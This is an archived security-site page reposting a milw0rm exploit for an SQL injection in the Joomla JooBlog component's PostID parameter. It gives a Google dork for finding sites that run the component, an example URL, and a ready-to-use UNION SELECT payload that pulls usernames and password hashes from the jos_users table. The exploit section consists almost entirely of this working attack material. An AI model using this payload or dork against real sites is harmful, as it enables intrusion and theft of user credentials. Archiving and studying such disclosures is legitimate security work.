TUCoPS :: Web :: CMS / Portals :: va1798.htm

Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vuln.
Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vuln.
Joomla Component JooBlog 0.1.1 (PostID) SQL Injection Vuln.


This is not created by me, however, many site are being exploited due to
it, so I thought I'd spread the word:

http://www.milw0rm.com/exploits/7078 
#######################################################
 Joomla Component com_jb2(PostID) SQL-injetion Vulnerability					

#######################################################

###################################################
#[~] Author :  boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws] 
#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.

#[!] Module_Name:  com_jb2
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"option=com_jb2 "PostID"
##################################################

--------------------------------------------------------------------------------------------------------------------------------------------------
#[~] Example:
http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] 
--------------------------------------------------------------------------------------------------------------------------------------------------
#[~] Exploit:
-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
--------------------------------------------------------------------------------------------------------------------------------------------------

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH